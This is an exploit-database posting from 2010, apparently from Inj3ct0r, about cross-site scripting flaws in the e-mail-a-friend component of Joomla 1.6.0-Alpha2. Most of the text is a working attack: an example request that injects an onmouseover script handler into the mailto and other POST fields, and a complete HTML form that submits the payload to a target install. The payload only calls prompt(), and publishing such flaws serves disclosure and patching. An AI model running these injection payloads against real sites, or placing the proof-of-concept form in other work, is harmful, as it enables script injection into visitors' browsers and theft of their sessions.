Joomla 1.6.0-Alpha2 XSS Vulnerabilities
Posted on 03 May 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Joomla 1.6.0-Alpha2 XSS Vulnerabilities </title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>======================================= Joomla 1.6.0-Alpha2 XSS Vulnerabilities ======================================= # Title:Joomla_1.6.0-Alpha2 XSS Vulnerabilities # Date: 2010-05-02 # Software Link: http://joomlacode.org/gf/download/frsrelease/11322/45252/Joomla_1.6.0-Alpha2-Full-Package.zip # Version: 1.6.0-alpha2 # Tested on: [relevant os] [:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::] >> General Information Advisory/Exploit Title = Joomla_1.6.0-Alpha2 XSS Vulnerabilities [:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::] >> Product information Name = Joomla Vendor = Joomla Vendor Website = http://www.joomla.org/ Affected Version(s) = 1.6.0-Alpha2 [:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::] >> #1 Vulnerability Type = XSS ( POST ) mailto,subject,from,sender Example URI = option=com_mailto&task=user%2Elogin&32720689cad34365fbe10002f91e50a9=1&mailto=%F6"+onmouseover=prompt(406426661849)//&sender=mega-itec@mega-ite.com&from=mega-itec@mega-ite.com&subject=mega-itec@mega-ite.com&layout=default&tmpl=component&link=encode link with base 64 >> #2 html code exploit : <form action="http://localhost/Joomla_1.6.0-Alpha2-Full-Package/index.php" name="mailtoForm" method="post"> <div style="padding: 10px;"> <div style="text-align:right"> <a href="javascript: void window.close()"> Close Window <img src="http://localhost/Joomla_1.6.0-Alpha2-Full-Package/components/com_mailto/assets/close-x.png" border="0" alt="" title="" /></a> </div> <h2> E-mail this link to a friend. </h2> <p> E-mail to: <br /> <input type="text" name="mailto" class="inputbox" size="25" value="&#65533;" onmouseover=prompt(406426661849)//"/> </p> <p> Sender: <br /> <input type="text" name="sender" class="inputbox" value="mega-itec@mega-ite.com" size="25" /> </p> <p> Your E-mail: <br /> <input type="text" name="from" class="inputbox" value="mega-itec@mega-ite.com" size="25" /> </p> <p> Subject: <br /> <input type="text" name="subject" class="inputbox" value="mega-itec@mega-ite.com" size="25" /> </p> <p> <button class="button" onclick="return submitbutton('send');"> Send </button> <button class="button" onclick="window.close();return false;"> Cancel </button> </p> </div> <input type="hidden" name="layout" value="default" /> <input type="hidden" name="option" value="com_mailto" /> <input type="hidden" name="task" value="send" /> <input type="hidden" name="tmpl" value="component" /> <input type="hidden" name="link" value="encode you link with base64" /> <input type="hidden" name="4b42dc29b4b226460d1b510634e21864" value="1" /></form> # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-03]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
